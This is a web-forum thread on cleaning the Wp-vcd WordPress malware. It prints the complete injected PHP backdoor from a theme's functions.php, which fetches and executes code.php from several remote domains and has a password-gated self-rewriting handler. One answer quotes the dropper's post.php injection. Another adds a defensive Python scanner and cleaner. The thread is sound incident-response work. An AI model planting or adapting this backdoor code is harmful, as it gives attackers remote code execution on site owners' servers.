Leonid, 2017-12-01 20:38:14
CMS

WordPress virus Wp-vcd Malware - how and with what to treat many sites on a local and remote server?

Today I found unfamiliar PHP code at the very beginning of the theme's functions.php file in the local copy of a client's site in OpenServer.
After analyzing the code (see its listing below), it becomes clear which malicious files the virus creates and uses:

@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
@file_put_contents('wp-tmp.php', $tmpcontent);

The content is taken from here: @file_get_contents("http://www.plimur.me/code.php")
It turned out to be the Wp-vcd malware (description: https://medium.com/@cirku17/wp-vcd-malware-analysi... ).
It has already infected all sites in Open Server's domains folder.
Now I'm thinking about what treatment plan to apply to the local sites on Open Server, as well as to the hosted sites, 99% of which are probably infected and will also have to be treated.
Search for the file manually and delete the code?
Use Wordfence Security?
How would you solve such a problem?
Dr.Web and the Casper scanner naturally do not react to this infection!
<?php
// Remote-control entry point: only reacts when the request carries the attacker's password hash.
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '6a4e5fe9a1201bb912b919582d2b4d6a')) {
    $div_code_name = "wp_vcd";
    switch ($_REQUEST['action']) {
        // Rewrites the download domain of code.php inside this file itself.
        case 'change_domain';
            if (isset($_REQUEST['newdomain'])) {
                if (!empty($_REQUEST['newdomain'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) {
                            $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
            break;

        // Replaces whatever sits between the //$start_wp_theme_tmp and //$end_wp_theme_tmp markers below.
        case 'change_code';
            if (isset($_REQUEST['newcode'])) {
                if (!empty($_REQUEST['newcode'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) {
                            $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
            break;

        default:
            print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }
    die("");
}

// Ordinary page loads end up here: fetch the payload, execute it, and cache a copy on disk.
$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if (!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI]; // sic: bare REQUEST_URI constant, as in the sample
    // Skips wp-cron and xmlrpc requests (sic: == false rather than === false, as in the sample)
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

        // Fallback downloader for hosts where file_get_contents() cannot open URLs
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }

        // Writes the downloaded PHP to a temp file, includes (i.e. executes) it, deletes it,
        // and hands the resulting variables back to be extract()ed into this scope
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            fwrite($handle, "<?php\n" . $phpCode);
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }

        // A payload is only executed if it contains this key
        $wp_auth_key = '4ac5f5262e6795cb9216f0b8db3a8f0b';

        // 1. Download from plimur.net, execute, and cache a copy as wp-tmp.php
        //    (wp-includes first, then the theme directory, then the current directory)
        if (($tmpcontent = @file_get_contents("http://www.plimur.net/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.plimur.net/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        }
        // 2. Same again from plimur.me
        elseif ($tmpcontent = @file_get_contents("http://www.plimur.me/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        }
        // 3. If no download worked, execute the cached copy from whichever location holds it
        elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        }
        // 4. Last resort: plimur.xyz
        elseif (($tmpcontent = @file_get_contents("http://www.plimur.xyz/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.plimur.xyz/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        }
    }
}

//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?>


5 answer(s)
Alex-1917, 2017-12-02
@alex-1917

Look for a backup without the rubbish, then after a while check whether the backup really turned out to be clean; if not, look for an even earlier one.
In general, judging by the statistics on this particular rubbish, most likely (I do not approve) the rubbish crept in from stolen plug-ins.
Didn't the question arise how millions of other WP sites manage not to get infected? And now you will make a mountain out of a molehill by throwing another stone into the WP garden.

karp900, 2018-01-21
@karp900

Everything is much simpler; the treatment procedure is simple, I myself fell for this rubbish. Here is an example of a file that was in the plugin during installation: class.plugin-modules.php
If you look closely at all the code, it becomes clear what needs to be done: it is simply not needed at all. Here is a small piece from this file:

if ( ($file = file_get_contents( $path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
{
    if (strpos($file, 'wp-vcd') === false) {
        $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname( __FILE__) .\'/wp-vcd.php\'); ?>' . $file;
        file_put_contents($path . '/wp-includes/post.
        //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents(' www.lanons.com/admin.txt '));
    }
}

It is one file that, when a third-party plugin or template is installed, creates the entire container of viruses; before installing, it is worth looking into what you are installing.

Boris Shpakovsky, 2018-03-11
@kotboris

I also stumbled across this crap the other day. The entire infection is located in the class.plugin-modules.php file; it was present in the plugin in 2 folders. You need to remove them and the plugin or theme is healthy. But if it has already managed to mess things up, then you first need to get into the functions.php of the current theme and find there the code you described in the question. Then in the WP core folder wp-includes find 2 files, wp-temp.php and wp-vcd.php, and delete them to hell) That's it, your WP is clean. I recommend checking all plugins and themes on VirusTotal before installing, but in general try not to use pirated plugins and themes. It is better to pay one and a half thousand once than to suffer from viruses later. I buy licenses, but then I suddenly decided to check a nulled plugin before buying it, and I really regretted it. My sites have dropped out of the top because of this rubbish and it is not known when they will return now.
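The cleanup the question asks about and the answers above describe is mechanical enough to script across many sites: the injected block at the top of the theme's functions.php, the include line prepended to wp-includes/post.php (karp900's snippet), and the dropped wp-tmp.php, wp-vcd.php and class.plugin-modules.php files. The following Python script is an added example, not code from this thread or from any WordPress tool. It assumes the injected code matches the listing in the question (from the password-gated `$_REQUEST['action']` handler through `//$end_wp_theme_tmp ?>`) and that the post.php prepend matches karp900's snippet; the functions `scan`, `strip_injection`, `clean`, `build_sample_site` and `demo`, the `PLACEHOLDER_HASH` value and the sample site tree are all constructed here for the demonstration.

```python
"""Added example: scan a WordPress tree for the wp-vcd indicators named in this thread and clean it."""
import re
import shutil
import tempfile
from pathlib import Path

# File names the thread reports as dropped by, or carrying, the infection.
DROPPED_NAMES = {"wp-tmp.php", "wp-vcd.php", "class.plugin-modules.php"}
# Strings from the functions.php listing that a clean theme or core file never contains.
CONTENT_MARKERS = ("theme_temp_setup", "$start_wp_theme_tmp", "wp_vcd", "wp-vcd.php")
# Injected prefix of functions.php: from its own <?php through the ?> after //$end_wp_theme_tmp
# (assumed to match the listing in the question).
INJECTED_BLOCK = re.compile(
    r"<\?php\s*if\s*\(isset\(\$_REQUEST\['action'\]\).*?//\$end_wp_theme_tmp\s*\?>\s*", re.DOTALL)
# Include line prepended to wp-includes/post.php (assumed to match karp900's snippet).
POST_PREPEND = re.compile(
    r"<\?php\s*if\s*\(file_exists\(dirname\(__FILE__\)\s*\.\s*'/wp-vcd\.php'\)\)\s*"
    r"include_once\(dirname\(\s*__FILE__\s*\)\s*\.\s*'/wp-vcd\.php'\);\s*\?>\s*")


def scan(root: Path) -> list[tuple[str, str]]:
    """Return (relative path, indicator) for every PHP file under root that looks infected."""
    findings = []
    for path in sorted(p for p in root.rglob("*.php") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if path.name in DROPPED_NAMES:
            findings.append((rel, "dropped file name"))
            continue
        text = path.read_text(errors="replace")
        for marker in CONTENT_MARKERS:
            if marker in text:
                findings.append((rel, f"contains {marker}"))
                break
    return findings


def strip_injection(text: str) -> tuple[str, bool]:
    """Remove the functions.php block and/or the post.php prepend; report whether anything changed."""
    cleaned, n1 = INJECTED_BLOCK.subn("", text, count=1)
    cleaned, n2 = POST_PREPEND.subn("", cleaned, count=1)
    return cleaned, n1 + n2 > 0


def clean(root: Path, dry_run: bool = True) -> list[str]:
    """Delete dropped files and strip injected code; return the actions taken (or planned when dry_run)."""
    actions = []
    for rel, indicator in scan(root):
        path = root / rel
        if indicator == "dropped file name":
            actions.append(f"delete {rel}")
            if not dry_run:
                path.unlink()
            continue
        cleaned, changed = strip_injection(path.read_text(errors="replace"))
        if not changed:  # marker hit that neither pattern covers (another variant): manual review
            actions.append(f"REVIEW {rel}: {indicator}")
            continue
        actions.append(f"strip injected code from {rel}")
        if not dry_run:
            path.write_text(cleaned)
    return actions


def build_sample_site(root: Path) -> None:
    """Constructed demo tree: a minimal WordPress layout with the infection from this thread applied."""
    theme, inc, plugin = root / "wp-content/themes/demo", root / "wp-includes", root / "wp-content/plugins/nulled"
    for d in (theme, inc, plugin):
        d.mkdir(parents=True)
    injected = ("<?php\nif (isset($_REQUEST['action']) && isset($_REQUEST['password']) && "
                "($_REQUEST['password'] == 'PLACEHOLDER_HASH'))\n  { die(''); }\n"
                "$div_code_name = \"wp_vcd\";\nif(!function_exists('theme_temp_setup')) { }\n"
                "//$start_wp_theme_tmp\n//wp_tmp\n//$end_wp_theme_tmp\n?>")
    (theme / "functions.php").write_text(injected + "<?php\n// theme code\nadd_action('init', 'demo_init');\n")
    (theme / "wp-tmp.php").write_text("<?php /* cached payload */\n")
    (inc / "wp-vcd.php").write_text("<?php /* dropped payload */\n")
    (inc / "post.php").write_text("<?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) "
                                  "include_once(dirname( __FILE__) .'/wp-vcd.php'); ?><?php\n// core post.php\n")
    (plugin / "class.plugin-modules.php").write_text("<?php /* dropper */\n")
    (root / "wp-login.php").write_text("<?php\n// clean core file\n")


def demo() -> dict:
    """Build the constructed tree, dry-run, clean for real, and report what each stage saw."""
    root = Path(tempfile.mkdtemp(prefix="wpvcd-demo-"))
    try:
        build_sample_site(root)
        before, planned = scan(root), clean(root, dry_run=True)
        actions = clean(root, dry_run=False)
        return {"before": before, "planned": planned, "actions": actions, "after": scan(root),
                "functions_php": (root / "wp-content/themes/demo/functions.php").read_text(),
                "post_php": (root / "wp-includes/post.php").read_text()}
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    result = demo()
    print(*[f"infected: {rel} ({why})" for rel, why in result["before"]], *result["actions"], sep="\n")
    print("findings after cleanup:", result["after"])
```

Run as-is it builds the constructed tree, shows the dry run and then cleans it; for a real install call `scan(Path("/path/to/site"))`, read the findings, and only then `clean(..., dry_run=False)`. The patterns cover the variant shown in this thread, and the domains and stored payload are attacker-controlled and change, so a hit on the file-name list or a `REVIEW` line is a prompt for a manual look rather than a verdict. After cleaning, compare wp-includes against a fresh copy of the same WordPress version, since the post.php prepend only reflects what this particular dropper did.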

gadzhkamil, 2018-05-01
@gadzhkamil

Can't use search? The very first link has a detailed description of removing this muck: https://chtokak.com/post/chto-za-virus-wp-vcd-i-ka...
In general, do not install nulled plugins and themes; this bug only comes from there. Or at least clean them before installation: remove the files containing the wp-vcd keyword from the archive (usually it's class.plugin-modules.php, as written above).

@prografika, 2019-05-01

Oh yes, this server rubbish infects, and many hosting providers insist that it's not them; it's not a problem to clean the functions.php file and update the engine, but if you don't fix everything on the server, it's useless. I sometimes just suggest changing the server, since I don't deal with servers myself, and often even ordinary shared hosting is exposed, where there is no way to look for an infection.
